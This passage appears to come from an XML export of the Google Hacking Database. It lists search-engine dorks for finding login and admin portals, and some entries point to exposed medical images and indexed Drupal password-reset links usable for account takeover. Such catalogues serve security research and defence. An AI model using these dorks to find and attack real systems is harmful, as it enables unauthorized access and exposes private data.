<querystring>https://www.google.com/search?q=intext:&quot;Login&quot; inurl:/secure</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Shubhranshu Gorai</author>
</entry>
<entry>
<id>829</id>
<link>https://www.exploit-db.com/ghdb/829</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Mail admins login here to administrate your domain.&quot;</shortDescription>
<textualDescription>Another way to locate Postfix admin logon pages.</textualDescription>
<query>intext:&quot;Mail admins login here to administrate your domain.&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Mail+admins+login+here+to+administrate+your+domain.%22</querystring>
<edb></edb>
<date>2005-01-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>1085</id>
<link>https://www.exploit-db.com/ghdb/1085</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Master Account&quot; &quot;Domain Name&quot; &quot;Password&quot; inurl:/cgi-bin/qmailadmin</shortDescription>
<textualDescription>qmail mail admin login pages.There are several vulnerabilities relating to this software</textualDescription>
<query>intext:&quot;Master Account&quot; &quot;Domain Name&quot; &quot;Password&quot; inurl:/cgi-bin/qmailadmin</query>
<querystring>https://www.google.com/search?q=intext:%22Master+Account%22++%22Domain+Name%22+%22Password%22+inurl:/cgi-bin/qmailadmin+&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1104</id>
<link>https://www.exploit-db.com/ghdb/1104</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Master Account&quot; &quot;Domain Name&quot; &quot;Password&quot; inurl:/cgi-bin/qmailadmin</shortDescription>
<textualDescription>There seems to be several vulns for qmail.</textualDescription>
<query>intext:&quot;Master Account&quot; &quot;Domain Name&quot; &quot;Password&quot; inurl:/cgi-bin/qmailadmin</query>
<querystring>https://www.google.com/search?q=intext:%22Master+Account%22++%22Domain+Name%22+%22Password%22+inurl:/cgi-bin/qmailadmin+&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>7418</id>
<link>https://www.exploit-db.com/ghdb/7418</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Open Game Panel 2021&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Open Game Panel 2021&quot;
# Pages Containing Login Portals
# Date:10/10/2021
# Exploit Author: Red Blue Ops</textualDescription>
<query>intext:&quot;Open Game Panel 2021&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Open Game Panel 2021&quot;</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>3975</id>
<link>https://www.exploit-db.com/ghdb/3975</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Please Authenticate&quot; intitle:Peakflow</shortDescription>
<textualDescription>Pages containing login portals - Web Server Detection
Finds Login portals for Arbor Peakflow (Anti-DDoS System)
Twitter - @libborius</textualDescription>
<query>intext:&quot;Please Authenticate&quot; intitle:Peakflow</query>
<querystring>https://www.google.com/search?q=intext:&quot;Please Authenticate&quot; intitle:Peakflow</querystring>
<edb></edb>
<date>2014-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7158</id>
<link>https://www.exploit-db.com/ghdb/7158</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Please enter the device's administrator password&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Please enter the device's administrator password&quot;
# Category: Pages Containing Login Portals
# Date: 02/09/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intext:&quot;Please enter the device's administrator password&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Please enter the device's administrator password&quot;</querystring>
<edb></edb>
<date>2021-09-06</date>
<author>s Thakur</author>
</entry>
<entry>
<id>5811</id>
<link>https://www.exploit-db.com/ghdb/5811</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Please enter your new password&quot; inurl:login filetype:php</shortDescription>
<textualDescription># Google Dork: intext:&quot;Please enter your new password&quot; inurl:login
filetype:php
# By using this dork, pages containing login portals can be found.
# Date: 20/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Please enter your new password&quot; inurl:login filetype:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;Please enter your new password&quot; inurl:login filetype:php</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5794</id>
<link>https://www.exploit-db.com/ghdb/5794</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;please enter your username and password&quot; inurl:login filetype:php</shortDescription>
<textualDescription>Category: Pages Containing Login Portals
Nicholas Doropoulos</textualDescription>
<query>intext:&quot;please enter your username and password&quot; inurl:login filetype:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;please enter your username and password&quot; inurl:login filetype:php</querystring>
<edb></edb>
<date>2020-03-16</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>5522</id>
<link>https://www.exploit-db.com/ghdb/5522</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Please log on to use the mikrotik hotspot service&quot; intitle:&quot;mikrotik hotspot &gt;login&quot; -github -site:mikrotik.com</shortDescription>
<textualDescription>mikrotik hotspot login:
intext:&quot;Please log on to use the mikrotik hotspot service&quot;
intitle:&quot;mikrotik hotspot &gt;login&quot; -github -site:mikrotik.com
Reza Abasi(Turku)
</textualDescription>
<query>intext:&quot;Please log on to use the mikrotik hotspot service&quot; intitle:&quot;mikrotik hotspot &gt;login&quot; -github -site:mikrotik.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;Please log on to use the mikrotik hotspot service&quot; intitle:&quot;mikrotik hotspot &gt;login&quot; -github -site:mikrotik.com</querystring>
<edb></edb>
<date>2019-09-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6892</id>
<link>https://www.exploit-db.com/ghdb/6892</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Please select your account&quot; intext:&quot;SSL Login&quot;</shortDescription>
<textualDescription># Dork: intext:&quot;Please select your account&quot; intext:&quot;SSL Login&quot;</textualDescription>
<query>intext:&quot;Please select your account&quot; intext:&quot;SSL Login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Please select your account&quot; intext:&quot;SSL Login&quot;</querystring>
<edb></edb>
<date>2021-04-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7603</id>
<link>https://www.exploit-db.com/ghdb/7603</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Powered by &quot; inurl:/login</shortDescription>
<textualDescription># Google Dork intext:&quot;Powered by &quot; inurl:/login
# Pages Containing Login Portals
# Date: 03/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intext:&quot;Powered by &quot; inurl:/login</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by &quot; inurl:/login</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7137</id>
<link>https://www.exploit-db.com/ghdb/7137</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Powered by Bitnami Redmine Stack&quot; inurl:/login</shortDescription>
<textualDescription># Google Dork: intext:&quot;Powered by Bitnami Redmine Stack&quot; inurl:/login
# Pages Containing Login Portals
# Date: 27/08/2021
# Exploit Author: Inderjeet Singh
</textualDescription>
<query>intext:&quot;Powered by Bitnami Redmine Stack&quot; inurl:/login</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by Bitnami Redmine Stack&quot; inurl:/login</querystring>
<edb></edb>
<date>2021-08-31</date>
<author>Inderjeet Singh</author>
</entry>
<entry>
<id>5689</id>
<link>https://www.exploit-db.com/ghdb/5689</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;powered by codoforum&quot; inurl:&quot;/user/login&quot;</shortDescription>
<textualDescription>Find forum websites powered by
codoforum
intext:&quot;powered by codoforum&quot; inurl:&quot;/user/login&quot;
intext:&quot;Powered by Codoforum&quot;</textualDescription>
<query>intext:&quot;powered by codoforum&quot; inurl:&quot;/user/login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;powered by codoforum&quot; inurl:&quot;/user/login&quot;</querystring>
<edb></edb>
<date>2020-01-09</date>
<author>Prasanth</author>
</entry>
<entry>
<id>7131</id>
<link>https://www.exploit-db.com/ghdb/7131</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;powered by enboard&quot; &quot;portal&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;powered by enboard&quot; &quot;portal&quot;
# Pages Containing Login Portals
# Date: 26/06/2021
# Exploit Author: Hindustani Hacker </textualDescription>
<query>intext:&quot;powered by enboard&quot; &quot;portal&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;powered by enboard&quot; &quot;portal&quot;</querystring>
<edb></edb>
<date>2021-08-25</date>
<author>Hindustani Hacker</author>
</entry>
<entry>
<id>4229</id>
<link>https://www.exploit-db.com/ghdb/4229</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Powered by net2ftp&quot;</shortDescription>
<textualDescription>Description: Web based FTP client login page
Google search: intext:&quot;Powered by net2ftp&quot;
Author: nebo_oben</textualDescription>
<query>intext:&quot;Powered by net2ftp&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by net2ftp&quot;</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6965</id>
<link>https://www.exploit-db.com/ghdb/6965</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Powered by Synnefo&quot;</shortDescription>
<textualDescription># Dork: intext:&quot;Powered by Synnefo&quot;</textualDescription>
<query>intext:&quot;Powered by Synnefo&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by Synnefo&quot;</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>4134</id>
<link>https://www.exploit-db.com/ghdb/4134</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Roundcube Webmail&quot; intitle:&quot;Welcome to Roundcube Webmail&quot; -site:roundcube.net</shortDescription>
<textualDescription>Roundcube Webmail Login Portals.
Decoy</textualDescription>
<query>intext:&quot;Roundcube Webmail&quot; intitle:&quot;Welcome to Roundcube Webmail&quot; -site:roundcube.net</query>
<querystring>https://www.google.com/search?q=intext:&quot;Roundcube Webmail&quot; intitle:&quot;Welcome to Roundcube Webmail&quot; -site:roundcube.net</querystring>
<edb></edb>
<date>2015-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5727</id>
<link>https://www.exploit-db.com/ghdb/5727</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Rubicon Communications, LLC (Netgate)&quot; intitle:&quot;Login&quot;</shortDescription>
<textualDescription>This dork found Pfsense Login Portals.You can modify you your need or
country extension.
Google Dork : intext:&quot;Rubicon Communications, LLC (Netgate)&quot; intitle:&quot;Login&quot;
Berat Isler ( root1x)
</textualDescription>
<query>intext:&quot;Rubicon Communications, LLC (Netgate)&quot; intitle:&quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Rubicon Communications, LLC (Netgate)&quot; intitle:&quot;Login&quot;</querystring>
<edb></edb>
<date>2020-02-06</date>
<author>berat isler</author>
</entry>
<entry>
<id>5668</id>
<link>https://www.exploit-db.com/ghdb/5668</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Service provided by Horos.&quot;</shortDescription>
<textualDescription># Google Dork : intext:&quot;Service provided by Horos.&quot;
# Description: Find websites with medical information about people, such as x-rays. Some logins are without authentication.
# Category : Files Containing Juicy Info
# Date : 17/12/2019
# Author : Leandro Naranjo
# Social: @tw1_lea</textualDescription>
<query>intext:&quot;Service provided by Horos.&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Service provided by Horos.&quot;</querystring>
<edb></edb>
<date>2019-12-18</date>
<author>Leandro Naranjo</author>
</entry>
<entry>
<id>7041</id>
<link>https://www.exploit-db.com/ghdb/7041</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;SGP&quot; inurl:/accounts/login?next=/admin/</shortDescription>
<textualDescription># Google Dork: intext:&quot;SGP&quot; inurl:/accounts/login?next=/admin/
# Pages Containing Login Portals
# Exploit Author: J. Igor Melo
</textualDescription>
<query>intext:&quot;SGP&quot; inurl:/accounts/login?next=/admin/</query>
<querystring>https://www.google.com/search?q=intext:&quot;SGP&quot; inurl:/accounts/login?next=/admin/</querystring>
<edb></edb>
<date>2021-07-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5240</id>
<link>https://www.exploit-db.com/ghdb/5240</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Sign in with your organizational account&quot; login -github.com</shortDescription>
<textualDescription>Office365 login pages.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>intext:&quot;Sign in with your organizational account&quot; login -github.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;Sign in with your organizational account&quot; login -github.com</querystring>
<edb></edb>
<date>2019-06-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>733</id>
<link>https://www.exploit-db.com/ghdb/733</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Storage Management Server for&quot; intitle:&quot;Server Administration&quot;</shortDescription>
<textualDescription>These pages can reveal information about the operating system and patch level, as well as providing a login portal for hackers to attack. &quot;As part of the IBM TotalStorageÂî Open Software Family, IBM Tivoli Storage (ADSM) Manager protects your organization's data from hardware failures and other errors by storing backup and archive copies of data on offline storage.&quot;</textualDescription>
<query>intext:&quot;Storage Management Server for&quot; intitle:&quot;Server Administration&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Storage+Management+Server+for%22+intitle:%22Server+Administration%22</querystring>
<edb></edb>
<date>2004-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>7024</id>
<link>https://www.exploit-db.com/ghdb/7024</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Switch Administrator&quot; inurl:config/log_off_page</shortDescription>
<textualDescription># Google Dork: intext:&quot;Switch Administrator&quot; inurl:config/log_off_page
# Category: Pages Containing Login Portals
# Date: 05/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intext:&quot;Switch Administrator&quot; inurl:config/log_off_page</query>
<querystring>https://www.google.com/search?q=intext:&quot;Switch Administrator&quot; inurl:config/log_off_page</querystring>
<edb></edb>
<date>2021-07-21</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4922</id>
<link>https://www.exploit-db.com/ghdb/4922</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Thank you for using BIG-IP.&quot;</shortDescription>
<textualDescription>BIG-IP F5 devices footprinting, it gives you login portals and errorcodes
for F5
Also try:
inurl:my.logout.php3?
inurl:&quot;/my.policy&quot; big-ip
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;Thank you for using BIG-IP.&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Thank you for using BIG-IP.&quot;</querystring>
<edb></edb>
<date>2018-08-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5830</id>
<link>https://www.exploit-db.com/ghdb/5830</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;This computer system is the property of&quot; -error</shortDescription>
<textualDescription>Category: Pages Containing Login Portals
Nicholas Doropoulos</textualDescription>
<query>intext:&quot;This computer system is the property of&quot; -error</query>
<querystring>https://www.google.com/search?q=intext:&quot;This computer system is the property of&quot; -error</querystring>
<edb></edb>
<date>2020-03-26</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>4817</id>
<link>https://www.exploit-db.com/ghdb/4817</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;this login can be used only once&quot; inurl:user intitle:&quot;reset password&quot;</shortDescription>
<textualDescription>This dork can hunt out vulnerable drupal websites with their password reset
pages of various accounts for account takeover.
*Description*:
Drupal users using PRLP (Password Reset Landing Page) module. When this
module is installed, If a user requests a new password, the requested user
will be mailed with a one time login link. These link comes with a expiry
date and time. This one time login link enabled the users to change their
passwords without asking for current password and also let them to login to
their account without changing their password.
Accidentally, these One Time Login Links are indexed by Search Engines and
this allowed any user to login as other user and change their passwords
using this One Time Login Link.
*Dork*:
intext:”this login can be used only once&quot; inurl:user intitle:&quot;reset password&quot;
*Category*: Pages Containing Login Portals
*Date*: 11-05-2018
The Infected Drake (@_tID)
</textualDescription>
<query>intext:&quot;this login can be used only once&quot; inurl:user intitle:&quot;reset password&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;this login can be used only once&quot; inurl:user intitle:&quot;reset password&quot;</querystring>
<edb></edb>
<date>2018-05-11</date>
<author>The Infected Drake</author>
</entry>
<entry>
<id>5038</id>
<link>https://www.exploit-db.com/ghdb/5038</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Type in Username and Password, then click Ok&quot; intitle:&quot;log in&quot;</shortDescription>
<textualDescription>Web login panel
ManhNho
</textualDescription>
<query>intext:&quot;Type in Username and Password, then click Ok&quot; intitle:&quot;log in&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Type in Username and Password, then click Ok&quot; intitle:&quot;log in&quot;</querystring>
<edb></edb>
<date>2018-11-27</date>
<author>ManhNho</author>
</entry>
<entry>
<id>7678</id>
<link>https://www.exploit-db.com/ghdb/7678</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;untitled&quot; intext:&quot;admin&quot; filetype:php</shortDescription>
<textualDescription># Google Dork: intext:&quot;untitled&quot; intext:&quot;admin&quot; filetype:php
# Pages Containing Login Portals
# Date:8/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>intext:&quot;untitled&quot; intext:&quot;admin&quot; filetype:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;untitled&quot; intext:&quot;admin&quot; filetype:php</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7616</id>
<link>https://www.exploit-db.com/ghdb/7616</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;untitled&quot; intext:&quot;login&quot; filetype:php</shortDescription>
<textualDescription># Google Dork: intext:&quot;untitled&quot; intext:&quot;login&quot; filetype:php
# Pages Containing Login Portals
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext:&quot;untitled&quot; intext:&quot;login&quot; filetype:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;untitled&quot; intext:&quot;login&quot; filetype:php</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7623</id>
<link>https://www.exploit-db.com/ghdb/7623</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;untitled&quot; intext:&quot;password&quot; filetype:php</shortDescription>
<textualDescription># Google Dork: intext:&quot;untitled&quot; intext:&quot;password&quot; filetype:php
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext:&quot;untitled&quot; intext:&quot;password&quot; filetype:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;untitled&quot; intext:&quot;password&quot; filetype:php</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>5828</id>
<link>https://www.exploit-db.com/ghdb/5828</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Welcome Admin&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Welcome Admin&quot;
# By using this dork, pages containing various login portals can be found.
# Date: 26/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Welcome Admin&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Welcome Admin&quot;</querystring>
<edb></edb>
<date>2020-03-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5929</id>
<link>https://www.exploit-db.com/ghdb/5929</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Welcome Site/User Administrator&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Welcome Site/User Administrator&quot;
# Various pages containing login portals.
# Date: 20/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Welcome Site/User Administrator&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Welcome Site/User Administrator&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6291</id>
<link>https://www.exploit-db.com/ghdb/6291</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Welcome to Intranet&quot; &quot;login&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Welcome to Intranet&quot; &quot;login&quot;
# Intranet login pages.
# Date: 2020-06-10
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Welcome to Intranet&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Welcome to Intranet&quot; &quot;login&quot;</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5763</id>
<link>https://www.exploit-db.com/ghdb/5763</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Welcome to JIRA&quot; &quot;Powered by a free Atlassian Jira community&quot;</shortDescription>
<textualDescription>intext:&quot;Welcome to JIRA&quot; &quot;Powered by a free Atlassian Jira community&quot;
By
Sagar Banwa
</textualDescription>
<query>intext:&quot;Welcome to JIRA&quot; &quot;Powered by a free Atlassian Jira community&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Welcome to JIRA&quot; &quot;Powered by a free Atlassian Jira community&quot;</querystring>
<edb></edb>
<date>2020-03-03</date>
<author>Sagar Banwa</author>
</entry>
<entry>
<id>7166</id>
<link>https://www.exploit-db.com/ghdb/7166</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Welcome to ZXHN H198A&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Welcome to ZXHN H198A&quot;
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intext:&quot;Welcome to ZXHN H198A&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Welcome to ZXHN H198A&quot;</querystring>
<edb></edb>
<date>2021-09-08</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1011</id>
<link>https://www.exploit-db.com/ghdb/1011</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Welcome to&quot; inurl:&quot;cp&quot; intitle:&quot;H-SPHERE&quot; inurl:&quot;begin.html&quot; -Fee</shortDescription>
<textualDescription>This gives results for hosting plans that don't have associated fees, so anyone can sign up with false information and no credit card details</textualDescription>
<query>intext:&quot;Welcome to&quot; inurl:&quot;cp&quot; intitle:&quot;H-SPHERE&quot; inurl:&quot;begin.html&quot; -Fee</query>
<querystring>https://www.google.com/search?num=100&amp;q=intext%3A%22Welcome+to%22+inurl%3A%22cp%22+intitle%3A%22H-SPHERE%22+inurl%3A%22begin.html%22+-Fee</querystring>
<edb></edb>
<date>2005-06-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>5833</id>
<link>https://www.exploit-db.com/ghdb/5833</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Welcome! Log in or create an account to continue.&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Welcome! Log in or create an account to continue.&quot;
# By using this dork, various web pages containing login portals can be
found.
# Date: 27/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Welcome! Log in or create an account to continue.&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Welcome! Log in or create an account to continue.&quot;</querystring>
<edb></edb>
<date>2020-03-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>937</id>
<link>https://www.exploit-db.com/ghdb/937</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&amp;quot;vbulletin&amp;quot; inurl:admincp</shortDescription>
<textualDescription>vBulletin Admin Control Panel</textualDescription>
<query>intext:&quot;vbulletin&quot; inurl:admincp</query>
<querystring>https://www.google.com/search?q=intext%3A%22vbulletin%22+inurl%3Aadmincp&amp;lr=</querystring>
<edb></edb>
<date>2005-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4978</id>
<link>https://www.exploit-db.com/ghdb/4978</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:(username | user | email | sign on | login | auth) admin dashboard | panel -stackoverflow</shortDescription>
<textualDescription>A lot of login portals.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:(username | user | email | sign on | login | auth) admin dashboard | panel -stackoverflow</query>
<querystring>https://www.google.com/search?q=intext:(username | user | email | sign on | login | auth) admin dashboard | panel -stackoverflow</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4833</id>
<link>https://www.exploit-db.com/ghdb/4833</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:2001.-.2018.umbraco.org ext:aspx</shortDescription>
<textualDescription> Identify admin login portals for websites built with Umbraco CMS.
Author: Raj Kiran P
</textualDescription>
<query>intext:2001.-.2018.umbraco.org ext:aspx</query>
<querystring>https://www.google.com/search?q=intext:2001.-.2018.umbraco.org ext:aspx</querystring>
<edb></edb>
<date>2018-05-31</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>6934</id>
<link>https://www.exploit-db.com/ghdb/6934</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:clave inurl:admin.php</shortDescription>
<textualDescription># Exploit Title: Pages containing login portals
# Google Dork: intext:clave inurl:admin.php
# Date: 2021-05-14
# Exploit Author: Aniket Prabhakar
</textualDescription>
<query>intext:clave inurl:admin.php</query>
<querystring>https://www.google.com/search?q=intext:clave inurl:admin.php</querystring>
<edb></edb>
<date>2021-05-14</date>
<author>Aniket Prabhakar</author>
</entry>
<entry>
<id>3843</id>
<link>https://www.exploit-db.com/ghdb/3843</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:Computer Misuse Act inurl:login.aspx</shortDescription>
<textualDescription>Category : Pages containing login portals
Description : Dork for finding sensitive login portals
Dork : intext:Computer Misuse Act inurl:login.aspx
Link : https://encrypted.google.com/#hl=en&amp;output=search&amp;sclient=psy-ab&amp;q=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&amp;oq=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&amp;gs_l=hp.3...1565.1565.0.1684.1.1.0.0.0.0.105.105.0j1.1.0...0.0...1c.1.7.psy-ab.ZaZN16Ureds&amp;pbx=1&amp;bav=on.2,or.r_qf.&amp;bvm=bv.44011176,d.ZWU&amp;fp=7b93b16efbccc178&amp;biw=1362&amp;bih=667
Date : 20/3/2013
Author : Scott Sturrock
Email: f00bar'at'linuxmail'dot'org</textualDescription>
<query>intext:Computer Misuse Act inurl:login.aspx</query>
<querystring>https://www.google.com/search?q=intext:Computer Misuse Act inurl:login.aspx</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4843</id>
<link>https://www.exploit-db.com/ghdb/4843</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:Connect.with.Finalsite intitle:admin -facebook</shortDescription>
<textualDescription>Admin login pages of website using Finalsite CMS.
Author: Raj Kiran P
</textualDescription>
<query>intext:Connect.with.Finalsite intitle:admin -facebook</query>
<querystring>https://www.google.com/search?q=intext:Connect.with.Finalsite intitle:admin -facebook</querystring>
<edb></edb>
<date>2018-06-05</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>5280</id>
<link>https://www.exploit-db.com/ghdb/5280</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:Grafana New version available! -grafana.com -grafana.org inurl:/login</shortDescription>
<textualDescription># Exploit Title: Grafana login
# Google Dork: intext:Grafana New Version available! -grafana.com
-grafana.org inurl:/login
# Author: Francis Al Victoriano
</textualDescription>
<query>intext:Grafana New version available! -grafana.com -grafana.org inurl:/login</query>
<querystring>https://www.google.com/search?q=intext:Grafana New version available! -grafana.com -grafana.org inurl:/login</querystring>
<edb></edb>
<date>2019-07-15</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>4852</id>
<link>https://www.exploit-db.com/ghdb/4852</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:Omeka*Username Powered.by.Omeka inurl:admin -github -omeka.org</shortDescription>
<textualDescription>Retrieve all admin login page of websites that use Omeka CMS.
Author: Raj Kiran P
</textualDescription>
<query>intext:Omeka*Username Powered.by.Omeka inurl:admin -github -omeka.org</query>
<querystring>https://www.google.com/search?q=intext:Omeka*Username Powered.by.Omeka inurl:admin -github -omeka.org</querystring>
<edb></edb>
<date>2018-06-11</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>5764</id>
<link>https://www.exploit-db.com/ghdb/5764</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:OpenCart inurl:index.php?route=common/dashboard</shortDescription>
<textualDescription>Using this Dork we can find Admin panels of hosted OpenCart.
https://www.opencart.com/
https://www.linkedin.com/in/usmanalimaan/
A free shopping cart system. OpenCart is an open source PHP-based online e-commerce solution.
www.opencart.com
</textualDescription>
<query>intext:OpenCart inurl:index.php?route=common/dashboard</query>
